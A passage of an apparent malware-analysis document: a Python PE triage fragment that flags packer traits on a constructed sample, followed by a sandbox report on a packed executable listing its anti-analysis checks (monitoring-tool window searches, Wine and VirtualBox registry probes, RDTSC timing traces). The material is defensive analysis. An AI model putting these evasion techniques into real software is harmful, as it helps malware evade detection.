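def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Header checksum as implemented by public tools such as pefile: 32-bit sum with
    end-around carry, the CheckSum field itself skipped, folded to 16 bits, plus file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 = indistinguishable from random)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def triage(data: bytes) -> List[Tuple[str, str]]:
    """Return (finding code, detail) pairs for the conditions the report flags."""
    pe, findings = parse_pe(data), []
    for s in pe["sections"]:
        flags = "".join(f for f, bit in (("R", SCN_READ), ("W", SCN_WRITE), ("E", SCN_EXECUTE)) if s["chars"] & bit)
        if not s["name"]:
            findings.append(("empty-section-name", f"section at RVA 0x{s['rva']:x}"))
        elif s["name"] not in STANDARD_SECTIONS:
            findings.append(("nonstandard-section-name", s["name"]))
        if "W" in flags and "E" in flags:
            findings.append(("rwx-section", f"{s['name']!r} is {flags}"))
        if len(s["raw"]) >= 256 and entropy(s["raw"]) > 7.0:       # threshold is an assumption
            findings.append(("high-entropy-section", f"{s['name']!r} entropy {entropy(s['raw']):.2f}"))
    ep = next((s for s in pe["sections"]
               if s["rva"] <= pe["entry"] < s["rva"] + max(s["vsize"], len(s["raw"]))), None)
    if ep is None:
        findings.append(("entry-outside-sections", f"0x{pe['entry']:x}"))
    elif ep["name"] not in STANDARD_SECTIONS:
        findings.append(("entry-in-nonstandard-section", f"0x{pe['entry']:x} in {ep['name']!r}"))
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["checksum"] != computed:
        findings.append(("checksum-mismatch", f"header 0x{pe['checksum']:x}, computed 0x{computed:x}"))
    return findings


# Constructed sample modelled on the report's layout: an unnamed RWX section, .rsrc,
# .idata, the high-entropy packer section nezugdgl, and .taggant holding the entry point.
SAMPLE_SECTIONS = [
    ("", 0x1000, b"\xC3" * 512, SCN_READ | SCN_WRITE | SCN_EXECUTE),
    (".rsrc", 0x2000, b"\0" * 512, SCN_READ | SCN_WRITE),
    (".idata", 0x3000, b"\0" * 512, SCN_READ | SCN_WRITE),
    ("nezugdgl", 0x4000, bytes(range(256)) * 16, SCN_READ | SCN_WRITE | SCN_EXECUTE),
    (".taggant", 0x6000, b"\xC3" * 512, SCN_READ | SCN_WRITE | SCN_EXECUTE),
]


def sample_image(checksum: int = 0) -> bytes:
    return build_pe32(SAMPLE_SECTIONS, entry_rva=0x6010, checksum=checksum)


def fix_checksum(data: bytes) -> bytes:
    """Write the computed checksum into the header, i.e. the state a linker leaves behind."""
    off = parse_pe(data)["checksum_offset"]
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


if __name__ == "__main__":
    for code, detail in triage(sample_image()):
        print(f"{code}: {detail}")
```

A mismatching checksum on its own is weak evidence (many legitimate unsigned binaries ship with a zero or stale CheckSum), so it is reported as one finding among several rather than as a verdict; the combination with unnamed and writable-executable sections and an entry point outside the standard sections is what makes the packer stand out here.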

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C19860 GetProcAddress (x21), LoadLibraryA (x5), GetProcAddress (x7)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13548)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8055 second address: FD8065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8065 second address: FD806C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD806C second address: FD8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8408CC9F86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8078 second address: FD8085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F84086DC792h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8338 second address: FD833E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD833E second address: FD835D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84086DC796h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD84F1 second address: FD84F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD84F5 second address: FD84FF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD84FF second address: FD8504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8504 second address: FD850C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD850C second address: FD8519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8519 second address: FD854A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC790h 0x00000007 jmp 00007F84086DC78Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F84086DC79Ah 0x00000016 pushad 0x00000017 jnp 00007F84086DC786h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD880F second address: FD8813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8813 second address: FD8823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC78Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD8823 second address: FD8835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8408CC9F8Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDB8A4 second address: FDB8A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDB9BC second address: FDB9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDB9C0 second address: FDB9C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDB9C4 second address: FDB9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDB9CA second address: FDBA16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F84086DC799h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F84086DC794h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA49 second address: FDBA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA51 second address: FDBA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA57 second address: FDBAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F8408CC9F8Bh 0x0000000e push 00000000h 0x00000010 movzx edi, di 0x00000013 call 00007F8408CC9F89h 0x00000018 jnl 00007F8408CC9F94h 0x0000001e push eax 0x0000001f push eax 0x00000020 pushad 0x00000021 jne 00007F8408CC9F86h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pop eax 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f jl 00007F8408CC9F90h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBAA7 second address: FDBB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F84086DC793h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 je 00007F84086DC792h 0x00000018 jg 00007F84086DC78Ch 0x0000001e pop eax 0x0000001f sub dword ptr [ebp+122D1F11h], edi 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 mov dx, 2991h 0x0000002d push 00000003h 0x0000002f mov dword ptr [ebp+122D1EECh], ebx 0x00000035 mov edx, dword ptr [ebp+122D27E7h] 0x0000003b push CF9C2B63h 0x00000040 pushad 0x00000041 jno 00007F84086DC78Ch 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBB0B second address: FDBB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBB11 second address: FDBB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 0F9C2B63h 0x0000000d mov si, FF5Bh 0x00000011 lea ebx, dword ptr [ebp+1244D7D6h] 0x00000017 mov esi, dword ptr [ebp+122D1B07h] 0x0000001d xchg eax, ebx 0x0000001e jng 00007F84086DC795h 0x00000024 push eax 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBB4A second address: FDBB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBBCA second address: FDBBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBBD0 second address: FDBC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4CF8993Eh 0x00000010 movzx edx, bx 0x00000013 push 00000003h 0x00000015 sub dword ptr [ebp+122D1A4Fh], esi 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e movzx ecx, bx 0x00000021 pop edi 0x00000022 mov dword ptr [ebp+122D2F36h], eax 0x00000028 push 00000003h 0x0000002a mov esi, ebx 0x0000002c push F5924A59h 0x00000031 pushad 0x00000032 jng 00007F8408CC9F88h 0x00000038 push esi 0x00000039 pop esi 0x0000003a push esi 0x0000003b jmp 00007F8408CC9F95h 0x00000040 pop esi 0x00000041 popad 0x00000042 xor dword ptr [esp], 35924A59h 0x00000049 mov edi, dword ptr [ebp+122D307Dh] 0x0000004f lea ebx, dword ptr [ebp+1244D7E1h] 0x00000055 pushad 0x00000056 mov esi, 1FB96768h 0x0000005b mov si, FFA0h 0x0000005f popad 0x00000060 xchg eax, ebx 0x00000061 jo 00007F8408CC9F98h 0x00000067 push eax 0x00000068 push edx 0x00000069 jl 00007F8408CC9F86h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBC5F second address: FDBC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBC63 second address: FDBC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC825 second address: FEC82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC6CD second address: FFC6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8408CC9F92h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7E4 second address: FFA7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA967 second address: FFA985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F98h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADA5 second address: FFADB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F84086DC786h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAF33 second address: FFAF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB498 second address: FFB49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB49E second address: FFB4AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F8408CC9F86h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4AC second address: FFB4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC78Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4BA second address: FFB4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F8Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4C8 second address: FFB4CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4CC second address: FFB4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8BE3 second address: FC8C02 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push esi 0x0000000c pushad 0x0000000d jmp 00007F84086DC790h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB762 second address: FFB766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB766 second address: FFB77D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB77D second address: FFB782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB782 second address: FFB7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Eh 0x00000009 jmp 00007F84086DC78Ah 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F84086DC78Dh 0x0000001a jnl 00007F84086DC78Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBD47 second address: FFBD4C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBEC4 second address: FFBEFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC795h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F84086DC792h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBEFD second address: FFBF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F8408CC9F86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F8408CC9F8Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF18 second address: FFBF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF2A second address: FFBF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8408CC9F86h 0x0000000a popad 0x0000000b push esi 0x0000000c jp 00007F8408CC9F86h 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF40 second address: FFBF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC236 second address: FFC242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC242 second address: FFC24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC24C second address: FFC289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F8408CC9F86h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8408CC9F96h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC289 second address: FFC2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F84086DC799h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC2AF second address: FFC2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC567 second address: FFC58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b jng 00007F84086DC792h 0x00000011 popad 0x00000012 jc 00007F84086DC78Eh 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAA5 second address: FFDACC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8408CC9F99h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDACC second address: FFDAE1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F84086DC78Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAE1 second address: FFDAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408CC9F8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAF0 second address: FFDB09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC794h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC67 second address: FFFC89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8408CC9F8Ch 0x0000000c je 00007F8408CC9F86h 0x00000012 popad 0x00000013 push eax 0x00000014 jbe 00007F8408CC9F98h 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007F8408CC9F86h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC89 second address: FFFC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000185 second address: 1000189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000189 second address: 10001BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F84086DC794h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10002A8 second address: 10002AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10002AD second address: 10002B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF152 second address: FFF156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000395 second address: 1000399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10004B3 second address: 10004C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10004C4 second address: 10004C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCDC96 second address: FCDCA2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408CC9F8Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006AE7 second address: 1006AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006AEB second address: 1006B03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F8408CC9F86h 0x0000000d jnl 00007F8408CC9F86h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006B03 second address: 1006B16 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F84086DC786h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
